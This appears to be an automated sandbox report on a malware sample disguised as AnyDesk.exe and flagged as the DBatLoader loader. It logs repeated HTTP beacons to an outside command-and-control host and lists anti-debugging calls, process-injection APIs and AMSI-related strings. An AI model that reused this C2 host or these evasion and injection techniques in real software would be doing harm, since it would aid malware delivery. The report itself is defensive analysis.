2024-11-26 07:12:54 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:54 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:54 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:54 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	50033	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:56 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:57 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:56 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:57 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	50040	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:58 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:59 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:59 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:59 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	50047	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:00 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:13:01 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:13:01 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:13:01 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	50054	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:03 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:13:03 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:13:03 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:13:03 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	50061	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:05 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:13:05 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:13:05 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:13:05 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	50065	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:07 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:13:07 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:13:07 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:13:07 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	50072	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:09 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:13:10 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:13:09 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:13:10 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Target ID:	0
Start time:	02:11:04
Start date:	26/11/2024
Path:	C:\Users\user\Desktop\AnyDesk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AnyDesk.exe"
Imagebase:	0x400000
File size:	1'299'968 bytes
MD5 hash:	BCEEA9753420A675AF68CDA43864438E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.8%
Total number of Nodes:	259
Total number of Limit Nodes:	11

Executed Functions

Function 02B3F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InetIsOffline.URL(00000000,00000000,02B4B784,?,?,?,00000000,00000000), ref: 02B3F801

Part of subcall function 02B389D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA

Part of subcall function 02B3F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B3FAEB,UacInitialize,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,Initialize), ref: 02B3F6EE
Part of subcall function 02B3F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3F700

Part of subcall function 02B3F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3F754
Part of subcall function 02B3F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3F766
Part of subcall function 02B3F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3F77D

Part of subcall function 02B27E5C: GetFileAttributesA.KERNEL32(00000000,?,02B4041F,ScanString,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,UacScan,02BA7380,02B4B7B8,UacInitialize), ref: 02B27E67

Part of subcall function 02B2C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C9B8B8,?,02B40751,ScanBuffer,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,OpenSession), ref: 02B2C37B

Part of subcall function 02B3DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDAB
Part of subcall function 02B3DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDDB
Part of subcall function 02B3DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DDF0
Part of subcall function 02B3DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DE1C
Part of subcall function 02B3DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DE25

Part of subcall function 02B27E80: GetFileAttributesA.KERNEL32(00000000,?,02B4356F,ScanString,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,Initialize), ref: 02B27E8B

Part of subcall function 02B28048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B4370D,OpenSession,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,Initialize,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8), ref: 02B28055

Strings

CreateProcessWithLogonW, xrefs: 02B4AA39
BCryptRegisterProvider, xrefs: 02B3FF0F
CreateProcessW, xrefs: 02B4AA0C
GetProxyDllInfo, xrefs: 02B3FB2A
NtAlertResumeThread, xrefs: 02B4A611
Initialize, xrefs: 02B3F8FE, 02B4081C, 02B409B0, 02B40B4E, 02B40CF4, 02B40FA9, 02B4164C, 02B41A88, 02B41F32, 02B4203C, 02B42723, 02B42A55, 02B42D75, 02B430A9, 02B43257, 02B43583, 02B4393C, 02B45876, 02B45C0B, 02B46007, 02B461CC, 02B46438, 02B4656E, 02B46773, 02B476E8, 02B483A0, 02B493AD, 02B49FBD, 02B4A35B, 02B4A88A, 02B4AC44, 02B4B190
UacInitialize, xrefs: 02B3FA8E, 02B40155, 02B40898, 02B4553C, 02B458F2, 02B45DDF, 02B478ED, 02B4912F, 02B4954B
DlpGetWebSiteAccess, xrefs: 02B4A4E6
RtlCreateQueryDebugBuffer, xrefs: 02B4A6DD
tquery, xrefs: 02B4A0C6
CryptSIPVerifyIndirectData, xrefs: 02B3FDC7, 02B4A17B
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02B4098A
LdrGetProcedureAddress, xrefs: 02B4B07C
EnumServicesStatusExA, xrefs: 02B4A9D0
OpenProcess, xrefs: 02B4AB72
WriteVirtualMemory, xrefs: 02B4ABA5
EtwEventWrite, xrefs: 02B4B148
ntdll, xrefs: 02B4922B, 02B4927B, 02B4928F, 02B4A628, 02B4A65B, 02B4A68E, 02B4A6C1, 02B4A6F4, 02B4AE95, 02B4AEC8, 02B4AEFB, 02B4AF2E, 02B4AF61, 02B4AF94, 02B4AFC7, 02B4AFFA, 02B4B02D, 02B4B060, 02B4B093, 02B4B0C6, 02B4B0F9, 02B4B12C, 02B4B15F
I_QueryTagInformation, xrefs: 02B4923A
EnumProcessModules, xrefs: 02B4A9EE
URL=file:", xrefs: 02B46D57
mssip32, xrefs: 02B3FDAB, 02B3FDDE, 02B3FE11, 02B4A192
acS, xrefs: 02B43D02
SetUnhandledExceptionFilter, xrefs: 02B4AC0B
NtOpenSection, xrefs: 02B4AF17
UacScan, xrefs: 02B3F836, 02B400D9, 02B401D1, 02B407A0, 02B41386, 02B41964, 02B422C6, 02B429D9, 02B43C2E, 02B45B8F, 02B460FF, 02B462C4, 02B465EA, 02B466F7, 02B46955, 02B46A4D, 02B475F0, 02B47992, 02B47BA9, 02B47D3C, 02B47F90, 02B4841C, 02B485A5, 02B486FE, 02B488A4, 02B48A31, 02B48BC5, 02B48D44, 02B48FBB, 02B49429, 02B49643, 02B49824, 02B499BD, 02B49BF3, 02B4AA63
NtQueryDirectoryFile, xrefs: 02B4A994
Ntdll, xrefs: 02B4A97B, 02B4A98A, 02B4A999, 02B4A9A8
http, xrefs: 02B42128
SLLoadApplicationPolicies, xrefs: 02B49F08
FlushInstructionCache, xrefs: 02B4ABD8
VirtualAlloc, xrefs: 02B4AAD9
BCryptQueryProviderRegistration, xrefs: 02B3FEDC
can, xrefs: 02B43D15
UacUninitialize, xrefs: 02B43844, 02B43BB2
GZmMS1j, xrefs: 02B3F80F
CreateProcessAsUserA, xrefs: 02B4AA1B
bcrypt, xrefs: 02B3FEC0, 02B3FEF3, 02B3FF26, 02B4A2BD
CryptSIPGetInfo, xrefs: 02B3FD94
ieproxy, xrefs: 02B3FB14, 02B3FB3B, 02B3FB6B
DllRegisterServer, xrefs: 02B3FB54, 02B400A0
NtSetSecurityObject, xrefs: 02B49276
SLGatherMigrationBlob, xrefs: 02B4AE18
[InternetShortcut], xrefs: 02B46D48
VirtualProtect, xrefs: 02B4AB3F
DlpNotifyPreDragDrop, xrefs: 02B4A44D
sppwmi, xrefs: 02B4ADFC
DllGetActivationFactory, xrefs: 02B4006D
NtAccessCheck, xrefs: 02B4B016
psapi, xrefs: 02B4A9F3
MiniDumpWriteDump, xrefs: 02B4924E
CreateProcessA, xrefs: 02B4A9FD
NtOpenObjectAuditAlarm, xrefs: 02B49226
SLGetSLIDList, xrefs: 02B49EA2
EtwEventWriteEx, xrefs: 02B4B115
IconIndex=, xrefs: 02B46DAD
DllGetClassObject, xrefs: 02B3FB03, 02B4003A, 02B4A115, 02B4ADE5
DlpCheckIsCloudSyncApp, xrefs: 02B4A480
SLIsGenuineLocalEx, xrefs: 02B49ED5
/o, xrefs: 02B464C0
psapi, xrefs: 02B4A15F
endpointdlp, xrefs: 02B4A464, 02B4A497, 02B4A4CA, 02B4A4FD
NtQuerySystemInformation, xrefs: 02B4A976
NtOpenProcess, xrefs: 02B4928A
NtWriteVirtualMemory, xrefs: 02B4B0AF
RetailTracerEnable, xrefs: 02B4A0AF
FindCertsByIssuer, xrefs: 02B3FC69
NtQuerySecurityObject, xrefs: 02B4AFE3
TrustOpenStores, xrefs: 02B3FC03
Kernel32, xrefs: 02B4AA02, 02B4AA11, 02B4AA4D
BCryptVerifySignature, xrefs: 02B3FEA9, 02B4A2A6
SLGetGenuineInformation, xrefs: 02B49E6F
ScanString, xrefs: 02B3F962, 02B3FB8D, 02B3FCA2, 02B3FE33, 02B3FFC4, 02B4024D, 02B4038E, 02B40914, 02B4152C, 02B416C8, 02B41B04, 02B41D1F, 02B41D9B, 02B420B8, 02B423DE, 02B426A7, 02B42AE4, 02B42F15, 02B43125, 02B431DB, 02B434DD, 02B435FF, 02B438C0, 02B455B8, 02B45752, 02B45A97, 02B45E5B, 02B464F2, 02B46CD8, 02B46E4F, 02B46F07, 02B47574, 02B47A0E, 02B47E75, 02B48498, 02B48F3F, 02B49331, 02B4971A, 02B49AFB, 02B49DF9, 02B4A1B4, 02B4A59B, 02B4A792, 02B4AD3C
dbgcore, xrefs: 02B49253, 02B49267
wintrust, xrefs: 02B3FC1A, 02B3FC4D, 02B3FC80
ScanBuffer, xrefs: 02B3F9C6, 02B3FD1E, 02B3FF48, 02B404AF, 02B405BC, 02B406D4, 02B40AA8, 02B40C46, 02B40DEC, 02B40F0C, 02B410A1, 02B41199, 02B41402, 02B415A8, 02B41744, 02B4185A, 02B418E8, 02B41BFC, 02B41E9D, 02B41FAE, 02B4214B, 02B424F6, 02B42602, 02B42820, 02B4293D, 02B42C58, 02B42CF9, 02B42E6D, 02B4302D, 02B4334F, 02B43719, 02B439B8, 02B43ABA, 02B456B0, 02B459EA, 02B45D03, 02B46083, 02B463BC, 02B46666, 02B4686B, 02B469D1, 02B46B45, 02B46BC1, 02B47764, 02B477F5, 02B47C25, 02B47DB8, 02B47F14, 02B4800C, 02B48529, 02B487F6, 02B4899C, 02B48B29, 02B48CBD, 02B48E3C, 02B490B3, 02B491AB, 02B495C7, 02B498A0, 02B49A39, 02B49C6F, 02B49D01, 02B4A039, 02B4A3D7, 02B4A906, 02B4B20C
EnumServicesStatusExW, xrefs: 02B4A9DF
HotKey=, xrefs: 02B46EE1
VirtualAllocEx, xrefs: 02B4AB0C
SxTracerGetThreadContextDebug, xrefs: 02B4A0E2, 02B4ADB2
kernel32, xrefs: 02B4AAF0, 02B4AB23, 02B4AB56, 02B4AB89, 02B4ABBC, 02B4ABEF, 02B4AC22
/d , xrefs: 02B464B5
NtGetWriteWatch, xrefs: 02B4AE7E
C:\\Users\\Public\\Libraries\\, xrefs: 02B4616F
spp, xrefs: 02B4A0F9, 02B4A12C, 02B4ADC9
C:\Users\Public\, xrefs: 02B45D88, 02B46FF3
Advapi, xrefs: 02B4A9B7, 02B4A9C6, 02B4A9D5, 02B4A9E4, 02B4AA20, 02B4AA2F, 02B4AA3E
NtOpenFile, xrefs: 02B4B0E2
LdrLoadDll, xrefs: 02B4B049
sppc, xrefs: 02B49E86, 02B49EB9, 02B49EEC, 02B49F1F, 02B4AE2F, 02B4AE62
MiniDumpReadDumpStream, xrefs: 02B49262
NtReadVirtualMemory, xrefs: 02B4AFB0
OpenSession, xrefs: 02B3F89A, 02B3FA2A, 02B40312, 02B40433, 02B40540, 02B40658, 02B40A2C, 02B40BCA, 02B40D70, 02B40E90, 02B41025, 02B4111D, 02B4130A, 02B414B0, 02B417DE, 02B41A0C, 02B41B80, 02B41CA3, 02B41E21, 02B421C7, 02B4224A, 02B42362, 02B4247A, 02B42586, 02B427A4, 02B428C1, 02B42B60, 02B42BDC, 02B42DF1, 02B42F91, 02B432D3, 02B43461, 02B4367B, 02B43795, 02B43B36, 02B45634, 02B457CE, 02B4596E, 02B45B13, 02B45C87, 02B45ED7, 02B45F8B, 02B46248, 02B46340, 02B467EF, 02B46AC9, 02B46C3D, 02B46DD3, 02B46F83, 02B4766C, 02B47871, 02B47A8A, 02B47B2D, 02B47CC0, 02B48088, 02B48324, 02B48621, 02B4877A, 02B48920, 02B48AAD, 02B48C41, 02B48DC0, 02B48EC3, 02B49037, 02B492B5, 02B494A5, 02B49796, 02B4991C, 02B49B77, 02B49D7D, 02B49F41, 02B4A230, 02B4A2DF, 02B4A51F, 02B4A716, 02B4A80E, 02B4ACC0, 02B4B288
